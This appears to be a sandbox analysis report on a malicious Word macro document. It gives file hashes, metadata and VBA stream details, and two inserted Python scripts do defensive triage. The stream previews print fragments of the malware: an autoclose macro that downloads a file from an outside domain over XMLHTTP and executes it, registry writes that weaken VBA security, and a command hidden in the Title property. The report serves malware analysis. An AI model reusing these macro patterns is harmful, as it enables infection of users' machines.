                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B02F65D-537D-406E-B057-1B1541B1D39D}.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1024
                      Entropy (8bit):0.05390218305374581
                      Encrypted:false
                      SSDEEP:3:ol3lYdn:4Wn
                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162688
                      Entropy (8bit):4.254385262261889
                      Encrypted:false
                      SSDEEP:1536:C6iL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CrJNSc83tKBAvQVCgOtmXmLpLm4l
                      MD5:195B512BF828E6BB1CFCA2CA7D4F6934
                      SHA1:532DD99AE79FFE705926EFCC4D3BCE4013DDFD9C
                      SHA-256:8A50F8F16887816C446FDC8FCFC209FAC328C17BE5B71267D787222B949CD6A3
                      SHA-512:38568620FCBAC080CA73DBB5B22D07044BBE213B92F229C59085C5838E202E94A8F3ED54EA61B86A85A41FB9359077CE02C0B661F0B35E1BDC72BFB9C3B54622
                      Malicious:false
                      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Datei-04.28.2021.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Apr 28 23:59:30 2021, length=103261, window=hide
                      Category:dropped
                      Size (bytes):2088
                      Entropy (8bit):4.536750505097161
                      Encrypted:false
                      SSDEEP:24:8NS/XTwz6Ikn7qOe85bDv3q0dM7dD2NS/XTwz6Ikn7qOe85bDv3q0dM7dV:8E/XT3Ik7lrU0Qh2E/XT3Ik7lrU0Q/
                      MD5:93F8BB958F53A70162B0496DB4F74AD8
                      SHA1:A20EB1D97E3E36A2AC77B4F0CA5D44A2D07A3DFE
                      SHA-256:A05344D0A236472B793D81456161DA9559A6AE259097C5E4101BB3D74D7E8544
                      SHA-512:E28B22379C584983B09AE4A3D18A3C3E6118C2837BECD16CF6B13DA8E28B0C9C2BB411F223C48F3DFEB356C8F6154750942E8C2C81367E19FCB2A6856A8E0D4E
                      Malicious:false
                      Preview: L..................F.... ....ju..{...ju..{......<..]............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2.]....Rp. .DATEI-~1.DOC..V.......Q.y.Q.y*...8.....................D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.......~...............-...8...[............?J......C:\Users\..#...................\\632922\Users.user\Desktop\Datei-04.28.2021.doc.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......632922..........D_....3N...W...9F.C....
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):86
                      Entropy (8bit):4.326022969633015
                      Encrypted:false
                      SSDEEP:3:M1SmMIRVELUl5eIRVELUlmX1SmMIRVELUlv:MQ7rLUrerLUf7rLU1
                      MD5:0BDE91546ED3D50D1B9A1B4A37CF9572
                      SHA1:16FC4A4A6EA006B381E57857AB4B29D966A847EB
                      SHA-256:4066E345B4B51909606757F4B5875000A5C838A8F8DE107415E6D67470FB032E
                      SHA-512:5133A71D4FBEE2EE09CA4626944F07C7AE3DF9F24CC6C3767488A57D9E1E23A6E6D01C8521A56A811DFE3CA18B375AEA3B8E45534A2DABA4FD1869307AD91FDC
                      Malicious:false
                      Preview: [doc]..Datei-04.28.2021.LNK=0..Datei-04.28.2021.LNK=0..[doc]..Datei-04.28.2021.LNK=0..
                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                      C:\Users\user\Desktop\~$tei-04.28.2021.doc
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
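The dropped-file entries above deserve a second look before the per-file "Malicious:false" flags are taken at face value: C:\ProgramData\argumentSelectTmp.jpg is typed as an HTML document, not an image, and it carries the same SHA-256 as the cached 404 page laka4[1].htm, so the content that was written under the .jpg name is the server's "Not Found" response rather than a payload. The following Python script is an added example, not part of the Joe Sandbox report or its tooling. It parses entries in the Key:Value layout used on this page (a constructed excerpt of three records copied from above is embedded), flags files whose detected type contradicts their extension, and groups records by SHA-256 so that identical content under different paths is visible. The EXPECTED_TYPE table and the parsing rules are this example's own assumptions.

```python
"""Triage of the 'Created / dropped Files' entries of a sandbox report.

Added example, not part of the original report or its tooling. It parses
entries in the Key:Value layout shown on this page, flags files whose
detected type contradicts their extension, and groups entries by SHA-256.
"""
import ntpath
import re
from collections import defaultdict

# Constructed excerpt: three records copied from the report above, same layout.
# A record starts with its path; every following line is Key:Value.
SAMPLE_REPORT = r"""C:\ProgramData\argumentSelectTmp.jpg
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:HTML document, ASCII text
Category:dropped
Size (bytes):204
SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\laka4[1].htm
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:HTML document, ASCII text
Category:downloaded
Size (bytes):204
SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73886A23.jpeg
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:[TIFF image data, little-endian, direntries=14, height=630, bps=182, compression=LZW, PhotometricIntepretation=RGB, orientation=upper-left, width=2288], baseline, precision 8, 828x186, frames 3
Category:dropped
Size (bytes):79188
SHA-256:0638205EBB792E3447169B46FBFB6BC48A1433B8335794ED4CEB6706F5290EF3
Malicious:false
"""

DRIVE_PATH = re.compile(r'^[A-Za-z]:\\')  # a line such as C:\... opens a new record

# Substrings expected in the libmagic description for a given extension
# (assumption of this example; extend as needed). Extensions without a rule
# get no verdict rather than a false positive.
EXPECTED_TYPE = {
    '.jpg': ('JPEG', 'image'), '.jpeg': ('JPEG', 'image'), '.png': ('PNG', 'image'),
    '.gif': ('GIF', 'image'), '.txt': ('text',),
    '.dll': ('PE32',), '.ocx': ('PE32',), '.exe': ('PE32',),
}


def parse_dropped_files(text):
    """Return a list of dicts, one per dropped-file record, keyed by the report's labels."""
    records, current = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if DRIVE_PATH.match(line):
            current = {'Path': line.strip()}
            records.append(current)
        elif current is not None and ':' in line:
            key, value = line.split(':', 1)  # split once: values may contain colons (C:\...)
            current[key.strip()] = value.strip()
    return records


def extension_mismatch(record):
    """Return (extension, detected type) when they contradict each other, else None."""
    ext = ntpath.splitext(record['Path'])[1].lower()
    expected = EXPECTED_TYPE.get(ext)
    if expected is None:
        return None
    file_type = record.get('File Type', '')
    if any(token.lower() in file_type.lower() for token in expected):
        return None
    return (ext, file_type)


def group_by_sha256(records):
    """Map SHA-256 -> list of paths, so identical content under different names stands out."""
    groups = defaultdict(list)
    for rec in records:
        if 'SHA-256' in rec:
            groups[rec['SHA-256'].upper()].append(rec['Path'])
    return dict(groups)


def triage(text):
    """Run both checks: ({path: (ext, type)}, {sha256: [paths]} for hashes seen more than once)."""
    records = parse_dropped_files(text)
    mismatches = {}
    for rec in records:
        hit = extension_mismatch(rec)
        if hit:
            mismatches[rec['Path']] = hit
    duplicates = {h: p for h, p in group_by_sha256(records).items() if len(p) > 1}
    return mismatches, duplicates


if __name__ == '__main__':
    found_mismatches, found_duplicates = triage(SAMPLE_REPORT)
    for path, (ext, ftype) in found_mismatches.items():
        print(f'extension/type mismatch: {path} claims {ext} but is "{ftype}"')
    for digest, paths in found_duplicates.items():
        print(f'same content ({digest[:12]}...) at: ' + ' | '.join(paths))
```

On the excerpt, the script reports argumentSelectTmp.jpg as an HTML document under an image extension and lists it together with laka4[1].htm under one SHA-256; the real JPEG in Content.MSO passes. To run it on a full report, paste the whole "Created / dropped Files" block in place of the constructed excerpt.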

                      Static File Info

                      General

                      File type:Microsoft Word 2007+
                      Entropy (8bit):7.82220089201397
                      TrID:
                      • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                      • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                      • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                      • ZIP compressed archive (8000/1) 5.23%
                      File name:Datei-04.28.2021.doc
                      File size:103261
                      MD5:6747583727ce069aa8ae9d398d35e5bc
                      SHA1:97667bf552bf5557666b5266003b0411bc1669bc
                      SHA256:127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd
                      SHA512:88ca8855faf07a809f7badd05e0a36da9b24f103204e66ff2624de77a6f86428bee188f290dd224cabf99fe9ba0d28e73d543967d9e591fed69128ddf08e1719
                      SSDEEP:1536:AH1R5bJCWehdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6egTm:KbJrlZAPY2yWwb3ZadaxHeuNQpegTm
                      File Content Preview:PK..........!.x..}....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                      File Icon

                      Icon Hash:e4eea2aaa4b4b4a4

                      Static OLE Info

                      General

                      Document Type:OpenXML
                      Number of OLE Files:1

                      OLE File "/opt/package/joesandbox/database/analysis/399362/sample/Datei-04.28.2021.doc"

                      Indicators

                      Has Summary Info:False
                      Application Name:unknown
                      Encrypted Document:False
                      Contains Word Document Stream:
                      Contains Workbook/Book Stream:
                      Contains PowerPoint Document Stream:
                      Contains Visio Document Stream:
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:True

                      Summary

                      Title:explorer c:\users\public\argumentSelectTmp.hta
                      Subject:
                      Author:ujmg
                      Keywords:
                      Template:Normal
Last Saved By:Пользователь Windows (Russian for "Windows User")
Revision Number:2
                      Total Edit Time:0
                      Create Time:2021-04-28T04:45:00Z
                      Last Saved Time:2021-04-28T04:45:00Z
                      Number of Pages:1
                      Number of Words:0
                      Number of Characters:0
                      Creating Application:Microsoft Office Word
                      Security:4

                      Document Summary

                      Number of Lines:2
                      Number of Paragraphs:0
                      Thumbnail Scaling Desired:false
                      Company:
                      Contains Dirty Links:false
                      Shared Document:false
                      Changed Hyperlinks:false
                      Application Version:16.0000
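The Summary block shows the document's Title property holding what reads as a command line (explorer c:\users\public\argumentSelectTmp.hta), on a file that is an OpenXML container with VBA under a legacy .doc extension. Storing a command in a document property and reading it from VBA at run time is a pattern seen in maldocs generally; the report does not show this sample's macro doing so, and the point here is only that the properties merit inspection alongside the macro streams. The following Python script is an added example, not code from the sandbox or from this sample. It builds a minimal OOXML container in memory (constructed input carrying the Title, Author and Last Saved By values from the report, with a placeholder vbaProject.bin part) and runs three static checks on it: ZIP magic under a pre-2007 extension, presence of a vbaProject.bin part, and core properties that match command-like patterns. The COMMAND_LIKE pattern and the build_sample_docm helper are this example's own assumptions; on a real file, read the bytes from disk instead of calling the builder.

```python
"""Static triage of an OOXML Word document's metadata (added example).

Not the sandbox's or the sample's code. Builds a minimal container in memory
with the metadata shown in the report, then runs the checks a reviewer would
run on the real file.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    'cp': 'http://schemas.openxmlformats.org/package/2006/metadata/core-properties',
    'dc': 'http://purl.org/dc/elements/1.1/',
}

# Constructed core.xml carrying the Title / Author / Last Saved By values from the report.
CORE_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
    '<dc:title>explorer c:\\users\\public\\argumentSelectTmp.hta</dc:title>'
    '<dc:creator>ujmg</dc:creator>'
    '<cp:lastModifiedBy>Пользователь Windows</cp:lastModifiedBy>'
    '</cp:coreProperties>'
) % (NS['cp'], NS['dc'])

# Script hosts that execute whatever they are handed, plus extensions those hosts run.
# Assumption of this example; tune to the environment.
COMMAND_LIKE = re.compile(
    r'\b(explorer|regsvr32|rundll32|mshta|wscript|cscript|cmd|powershell)\b'
    r'|\.(hta|dll|ocx|exe|js|vbs|ps1)\b', re.IGNORECASE)


def build_sample_docm():
    """Constructed sample container, not the real file: enough parts to exercise the checks."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('[Content_Types].xml', '<Types/>')
        z.writestr('docProps/core.xml', CORE_XML)
        z.writestr('word/document.xml', '<w:document/>')
        z.writestr('word/vbaProject.bin', b'\xd0\xcf\x11\xe0' + b'\x00' * 28)  # OLE2 magic only
    return buf.getvalue()


def ooxml_under_legacy_extension(file_name, data):
    """True when a ZIP (OOXML) container carries a pre-2007 binary Office extension."""
    return data[:2] == b'PK' and file_name.lower().endswith(('.doc', '.xls', '.ppt'))


def has_vba_project(data):
    """True when any part of the package is a vbaProject.bin (macros present)."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return any(name.lower().endswith('vbaproject.bin') for name in z.namelist())


def command_like_properties(data):
    """Return {property: value} for core properties whose value looks like a command line."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        if 'docProps/core.xml' not in z.namelist():
            return {}
        root = ET.fromstring(z.read('docProps/core.xml'))
    hits = {}
    for element in root:
        tag = element.tag.split('}', 1)[-1]  # drop the namespace, keep 'title', 'creator', ...
        if element.text and COMMAND_LIKE.search(element.text):
            hits[tag] = element.text
    return hits


def triage(file_name, data):
    """Bundle the three checks into one verdict dict."""
    return {
        'ooxml_under_legacy_ext': ooxml_under_legacy_extension(file_name, data),
        'has_vba': has_vba_project(data),
        'command_like_properties': command_like_properties(data),
    }


if __name__ == '__main__':
    sample = build_sample_docm()  # replace with open(path, 'rb').read() for a real file
    for key, value in triage('Datei-04.28.2021.doc', sample).items():
        print(f'{key}: {value}')
```

On the constructed sample all three checks fire: the container is a ZIP under a .doc name, a vbaProject.bin part is present, and only the title property matches the command pattern (the author and last-saved-by values do not). None of this proves execution; it tells the reviewer where to look next, which on this page is the VBA streams listed below.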

                      Streams with VBA

                      VBA File Name: ThisDocument.cls, Stream Size: 1127
                      General
                      Stream Path:VBA/ThisDocument
                      VBA File Name:ThisDocument.cls
                      Stream Size:1127
                      Data ASCII:. . . . . . . . . 4 . . . . . . . . . . . b . . . p . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . - . . i . H . ! . . W D Q . . . . . . . . K . . . . y . ' y . . . . . . . . . . . . . . . . . . . . X . O z . Y $ L . . . & . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . X . O z . Y $ L . . . & . . . - . . - . . i . H . ! . . W D Q . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 03 00 06 00 01 00 00 34 03 00 00 e4 00 00 00 ea 01 00 00 62 03 00 00 70 03 00 00 c4 03 00 00 00 00 00 00 01 00 00 00 71 cc 96 90 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 03 7f 2d b5 fa 69 1d 48 9e 21 86 f4 57 44 51 84 ef 8e e3 9e df be fe 4b b5 1f 1d 00 79 ba 27 79 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      False
                      VB_Exposed
                      Attribute
                      VB_Creatable
                      VB_Name
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      VB_Customizable
                      VB_TemplateDerived
                      "ThisDocument"
                      VBA Code
                      VBA File Name: UserForm1.frm, Stream Size: 1182
                      General
                      Stream Path:VBA/UserForm1
                      VBA File Name:UserForm1.frm
                      Stream Size:1182
                      Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . q . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                      VBA Code Keywords

                      Keyword
                      False
                      VB_Exposed
                      Attribute
                      VB_Name
                      VB_Creatable
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      VB_Customizable
                      VB_TemplateDerived
                      VBA Code
                      VBA File Name: listCopy.bas, Stream Size: 1037
                      General
                      Stream Path:VBA/listCopy
                      VBA File Name:listCopy.bas
                      Stream Size:1037
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . . . . . . . . . . . q . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                      VBA Code Keywords

                      Keyword
                      "listCopy"
                      clearIteratorRef
                      Attribute
                      autoopen()
                      convertIndex
                      VB_Name
                      viewValueTextbox
                      memoryIndex
                      String
                      VBA Code
                      VBA File Name: optionRemoveGeneric.bas, Stream Size: 1304
                      General
                      Stream Path:VBA/optionRemoveGeneric
                      VBA File Name:optionRemoveGeneric.bas
                      Stream Size:1304
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                      VBA Code Keywords

                      Keyword
                      optionPtr.Quit
                      False
                      optionPtr
                      String)
                      Attribute
                      optionPtr.Documents.Add
                      collectionSelect
                      VB_Name
                      CreateObject("word.application")
                      "optionRemoveGeneric"
                      memoryTempTrust
                      memoryIndex(memoryTempTrust
                      optionPtr.Visible
                      SaveChanges:=wdDoNotSaveChanges
                      collectionSelect.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
                      VBA Code
                      VBA File Name: refConvertCaption.bas, Stream Size: 1636
                      General
                      Stream Path:VBA/refConvertCaption
                      VBA File Name:refConvertCaption.bas
                      Stream Size:1636
                      Data ASCII:. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . q . u m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                      VBA Code Keywords

                      Keyword
                      String)
                      VB_Name
                      vbSwap
                      "refConvertCaption"
                      memCaptionOption.Text
                      StrConv(captionPaste,
                      Function
                      vbSwap.createElement("code")
                      exceptionPointer
                      Object
                      Variant
                      memConvertStruct)
                      ptrPtrStorage
                      memCaptionOption.DataType
                      constCollectionDatabase
                      memCaptionOption
                      memCaptionOption.nodeTypedValue
                      exceptionPointer(captionPaste,
                      ptrPtrStorage(constCollectionDatabase
                      Attribute
                      VBA Code
                      VBA File Name: repoText.bas, Stream Size: 2970
                      General
                      Stream Path:VBA/repoText
                      VBA File Name:repoText.bas
                      Stream Size:2970
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . ; . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                      VBA Code Keywords

                      Keyword
                      convertIndex
                      String)
                      "repoText"
                      clearRefLoad
                      .RegWrite
                      VB_Name
                      Public
                      Function
                      varClass
                      String
                      Application.Version
                      captionBufData()
                      textExButton
                      vbUnicode)
                      Chr$(Val("&H"
                      clearRefLoad,
                      "jZXNzVkJPTQ=="),
                      Mid$(tempClearIndex,
                      arrayOption
                      Len(tempClearIndex)
                      mainExLocal
                      listboxNextVar()
                      CreateObject("ws"
                      "VjdXJpdHlcQWN"
                      viewValueTextbox()
                      trustStruct
                      tempClearIndex
                      globalResponse
                      textExButton(ByVal
                      varClass()
                      arrayOption,
                      countSelect
                      captionBufData
                      titleSize
                      Attribute
                      "REG_DWORD"
                      "cript.sh"
                      "ell")
                      convertIndex()
                      listboxNextVar
                      clearReference
                      mainExLocal()
                      VBA Code

                      Streams

                      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 689
                      General
                      Stream Path:PROJECT
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:689
                      Entropy:5.29372046772
                      Base64 Encoded:True
                      Data ASCII:I D = " { 2 A 8 A 4 9 5 1 - B 5 C 1 - 4 C 9 C - A E 1 6 - E D B 1 E 3 E 7 5 4 8 3 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . M o d u l e = l i s t C o p y . . M o d u l e = r e f C o n v e r t C a p t i o n . . M o d u l e = o p t i o n R e m o v e G e n e r i c . . M o d u l e = r e p o T e x t . . N a m e = " P r o j e c t " . . H e l p
                      Stream Path: PROJECTwm, File Type: data, Stream Size: 239
                      General
                      Stream Path:PROJECTwm
                      File Type:data
                      Stream Size:239
                      Entropy:3.53833137583
                      Base64 Encoded:False
                      Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . l i s t C o p y . l . i . s . t . C . o . p . y . . . r e f C o n v e r t C a p t i o n . r . e . f . C . o . n . v . e . r . t . C . a . p . t . i . o . n . . . o p t i o n R e m o v e G e n e r i c . o . p . t . i . o . n . R . e . m . o . v . e . G . e . n . e . r . i . c . . . r e p o T e x t . r . e . p . o . T . e . x . t . . . . .
                      Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                      General
                      Stream Path:UserForm1/\x1CompObj
                      File Type:data
                      Stream Size:97
                      Entropy:3.61064918306
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                      Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 292
                      General
                      Stream Path:UserForm1/\x3VBFrame
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:292
                      Entropy:4.58743694765
                      Base64 Encoded:True
                      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                      Stream Path: UserForm1/f, File Type: data, Stream Size: 90
                      General
                      Stream Path:UserForm1/f
                      File Type:data
                      Stream Size:90
                      Entropy:2.89102698747
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . , . . . . . h o . . $ . . . . . . . . . . . . . X . . . . . . . T e x t B o x 1 4 . . . . . . .
                      Stream Path: UserForm1/o, File Type: data, Stream Size: 856
                      General
                      Stream Path:UserForm1/o
                      File Type:data
                      Stream Size:856
                      Entropy:5.78040237389
                      Base64 Encoded:True
                      Data ASCII:. . 8 . . . @ . . . . . . H . . . . . . . . . . { . . . S u b a u t o c l o s e ( ) . . d o w n l o a d . . e x e c u t e . . E n d S u b . . . . S u b d o w n l o a d ( ) . . . . S e t x m l h t t p = C r e a t e O b j e c t ( " m i c r o s o f t . x m l h t t p " ) . . x m l h t t p . O p e n " G E T " , " h t t p : / / b e t t e r - t r a n s p o r t - 2 0 0 8 . c o m / b i j o l / d V 6 T 3 i G 7 z Y Y N / G d U b 2 h c o K h 0 i 1 6 j t B 3 A 2 H 0 N A 1 h p c / 7 4 6 8
                      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4855
                      General
                      Stream Path:VBA/_VBA_PROJECT
                      File Type:data
